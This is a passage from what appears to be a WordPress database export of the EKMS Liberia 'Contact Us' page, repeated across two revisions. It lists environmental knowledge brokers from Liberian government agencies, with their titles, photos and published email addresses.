title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/nadine-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine A\'jami</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 11:02:14','2022-09-20 11:02:14','',80,'https://ekmsliberia.info/?p=5099',0,'revision','',0),(5100,42,'2022-09-20 11:02:14','2022-09-20 11:02:14','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" 